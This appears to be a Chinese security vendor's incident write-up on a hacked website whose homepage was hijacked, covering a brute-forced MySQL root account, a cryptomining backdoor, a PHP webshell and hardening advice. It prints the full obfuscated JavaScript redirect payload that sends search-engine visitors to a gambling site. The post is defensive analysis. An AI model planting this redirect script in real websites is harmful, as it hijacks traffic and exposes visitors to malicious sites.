如何解决公司网站首页被恶意跳转的安全问题

本文涉及的产品
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
云数据库 RDS MySQL,高可用系列 2核4GB
云数据库 RDS PostgreSQL,高可用系列 2核4GB
简介: 近日某客户网站被黑,导致网站首页被篡改并跳转到赌博网站,网站在百度的收录也收录了一些什么彩票内容的快照,网站首页快照也被修改成赌博内容,并被百度直接红色风险拦截提示,百度网址安全中心提醒您:该站点可能受到黑客攻击,部分页面已被非法篡改!我们SINE安全公司根据以上客户被黑的情况,立即进行了全面的网站安全检测,针对网站被黑的情况制定了详细的安全部署方案。

近日某客户网站被黑,导致网站首页被篡改并跳转到赌博网站,网站在百度的收录也收录了一些什么彩票内容的快照,网站首页快照也被修改成赌博内容,并被百度直接红色风险拦截提示,百度网址安全中心提醒您:该站点可能受到黑客攻击,部分页面已被非法篡改!我们SINE安全公司根据以上客户被黑的情况,立即进行了全面的网站安全检测,针对网站被黑的情况制定了详细的安全部署方案。

首先客户网站使用的是Linux centos系统服务器,客户提供服务器ip,ssh端口,root账号密码后,我们进去查看了服务器是否存在被黑以及系统木马后门的情况,再一个我们对其使用的mysql数据库进行了安全检测,发现问题,该mysql数据库的root账号使用的是弱口令密码,导致攻击者可以利用软件对数据库进行强力破解,导致破解成功,利用root权限直接提权并上传脚本木马到网站的根目录下。

根据上面发现的数据库安全问题,我们深度挖掘,追踪溯源,发现服务器还存在木马后门,top,查看linux当前进程,发现一个可疑的进程,通过查看进程的详细信息我们发现该进程是木马后门进程,再仔细一检查发现该木马是挖矿木马,攻击者利用服务器资源,带宽,进行挖矿,像比特币、以太坊等币进行挖矿。

我们对其挖矿木马进行安全分析:如下图

解密木马内容,我们发现该木马目前来说是免杀的木马,一般人是看不出问题来,但是经常维护服务器的运维人员就会察觉出来,第一该木马隐藏到linux进程当中去,根据时间段进行挖矿,避开高峰时间,以及维护人员的工作时间,当挖矿的时候木马进程CPU占用达到百分之80以上,甚至有时候网站都打开很慢。服务器的木马查完后,我们对网站的源代码进行安全检测,发现网站目录里被上传了网站木马后门,php脚本木马,该脚本木马可以对网站进行读写新建等操作,网站的首页标题描述也被改成了什么赌博的内容如下图:

<>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e

(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString

(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=

[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)

if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}

('3.4("<5 c=\\"b\\">");3.4("d 1=3.f");3.4("e(1.2(\\"7\\")>0 || 1.2(\

\"6\\")>0 || 1.2(\\"8\\")>0 ||1.2(\\"a\\")>0 ||1.2(\\"9\\")>0 ||1.2(\

\"l\\")>0 ||1.2(\\"m\\")>0 ||1.2(\\"k\\")>0 )");3.4("h.g=\\"j://i.o.n\

\";");3.4("</5>");',25,25,'|s|indexOf|document|writeln||sogou|

baidu|soso|uc|sm|Java|LANGUAGE|var|if|referrer|href|location|www|

http|so|bing|yahoo|com|268238'.split('|'),0,{}))

</>

通过解密上面的代码发现,只要是从百度,搜狗,以及soso,so,bing等搜索引擎来的访问,都会直接跳转到攻击者设定好的赌博网站上去。随即我们SINE安全公司对该恶意代码进行了清除,网站恢复正常访问。

以上就是我们解决客户网站安全的整个过程,下面针对于此次网站被黑,提供如下 的网站安全建议:

1.对mysql数据库进行安全部署,对root账号密码加密,尽可能设置的复杂一些,数字+大小写字母+特殊符号,对网站数据库进行分配普通权限账号。

2.mysql数据库默认端口3306,改为51158,并加入到端口安全策略,不对外开放,外网IP无法连接数据库,只有本地127.0.0.1才能进行连接数据库,以防止攻击者恶意猜测。

3.对服务器底层系统进行安全加固,包括SSH登录的安全验证。

4.对网站代码进行整体的安全检测,包括定期的升级网站程序源代码,修复补丁以及网站漏洞。

专注于安全领域 解决网站安全 解决网站被黑 网站被挂马 网站被篡改 网站安全、服务器安全提供商-www.sinesafe.com --专门解决其他人解决不了的网站安全问题.
相关实践学习
如何快速连接云数据库RDS MySQL
本场景介绍如何通过阿里云数据管理服务DMS快速连接云数据库RDS MySQL,然后进行数据表的CRUD操作。
全面了解阿里云能为你做什么
阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助 &nbsp; &nbsp; 相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
相关文章
|
存储 Kubernetes Java
SpringBoot整合MinIO
MinIO是一款基于Go语言开发的高性能、分布式的对象存储系统,开源可商用。一开始就被设计为服务于私有云、公有云、混合云,因此在高可用、可扩展性、高性能方面有得天独厚的优势。 MinIO完全实现了AWS S3 标准,在日常使用、扩展升级、迁移方面更易于管理,对于上层应用程序来说,存储和访问对象是统一的,即使MinIO服务迁移了,应用程序侧是无感知的。 MinIO分三个版本,开源版、标准版、企业版,开源版本免费使用,后面两个为付费产品。MinIO支持多种部署环境:Kubernetes、Docker、Linux、MacOS、Windows
609 1
SpringBoot整合MinIO
|
8月前
|
存储 SQL Apache
Apache Doris 开源最顶级基于MPP架构的高性能实时分析数据库
Apache Doris 是一个基于 MPP 架构的高性能实时分析数据库,以其极高的速度和易用性著称。它支持高并发点查询和复杂分析场景,适用于报表分析、即席查询、数据仓库和数据湖查询加速等。最新发布的 2.0.2 版本在性能、稳定性和多租户支持方面有显著提升。社区活跃,已广泛应用于电商、广告、用户行为分析等领域。
Apache Doris 开源最顶级基于MPP架构的高性能实时分析数据库
|
9月前
|
开发框架 人工智能 小程序
小程序常见的 UI 框架
【10月更文挑战第17天】小程序 UI 框架为开发者提供了便捷的工具和资源,帮助他们快速构建高质量的小程序界面。在选择框架时,需要综合考虑各种因素,以找到最适合项目的解决方案。随着技术的不断进步,UI 框架也将不断发展和创新,为小程序开发带来更多的便利和可能性。
614 58
|
11月前
|
PHP 开发者
深入浅出PHP:从入门到精通
【8月更文挑战第30天】在这篇文章中,我们将一起探索PHP的世界,从最基础的语法开始,逐步深入到更复杂的主题。我们将通过实例和代码示例,帮助你理解和掌握PHP的核心概念和技术。无论你是初学者还是有经验的开发者,这篇文章都将为你提供有价值的知识和技能。让我们一起开始这段旅程吧!
|
9月前
|
数据建模 网络安全
阿里云申请SSL证书价格多少钱一年?免费版和付费版价格手动整理
阿里云SSL证书提供多种类型和品牌的证书选择,包括免费和付费选项。付费证书如WoSign单域名SSL证书238元/年,DigiCert通配符DV证书1500元/年,GlobalSign企业型1864元/年。免费证书由Digicert提供,有效期3个月,适用于单域名。更多详情见阿里云官网。
2249 1
|
10月前
|
Java Android开发 C++
🚀Android NDK开发实战!Java与C++混合编程,打造极致性能体验!📊
在Android应用开发中,追求卓越性能是不变的主题。本文介绍如何利用Android NDK(Native Development Kit)结合Java与C++进行混合编程,提升应用性能。从环境搭建到JNI接口设计,再到实战示例,全面展示NDK的优势与应用技巧,助你打造高性能应用。通过具体案例,如计算斐波那契数列,详细讲解Java与C++的协作流程,帮助开发者掌握NDK开发精髓,实现高效计算与硬件交互。
320 1
|
11月前
|
网络协议 安全 网络安全
揭秘互联网的隐形斗篷:你的DNS数据真的安全吗?
【8月更文挑战第27天】在互联网中,每个网站通过IP地址定位,但记忆这些数字困难且存在安全风险。因此,域名系统(DNS)诞生,实现域名与IP之间的转换。然而,未加密的DNS请求易受中间人攻击,导致隐私泄露或恶意软件植入。为解决此问题,DNS-over-HTTPS(DoH)和DNS-over-TLS(DoT)协议应运而生,它们通过对DNS查询进行加密确保数据传输安全。本文将介绍这两种协议,并通过示例展示如何配置支持DoT的DNS服务器,包括安装dnscrypt-proxy、编辑配置文件及重启服务等步骤。
668 0
|
编解码 Android开发 iOS开发
「UCD」移动端UI设计尺寸规范详解
【7月更文挑战第2天】
1234 3
|
11月前
|
SQL 缓存 数据库
大型网站优化指南:打造流畅的在线体验
大型网站优化指南:打造流畅的在线体验
239 0
|
API 开发者
百度翻译接口API的获取与授权方法
本文介绍获取百度翻译官方接口及其密钥,并将接口授权给自己或他人开发的软件或插件的方法~
2187 1
百度翻译接口API的获取与授权方法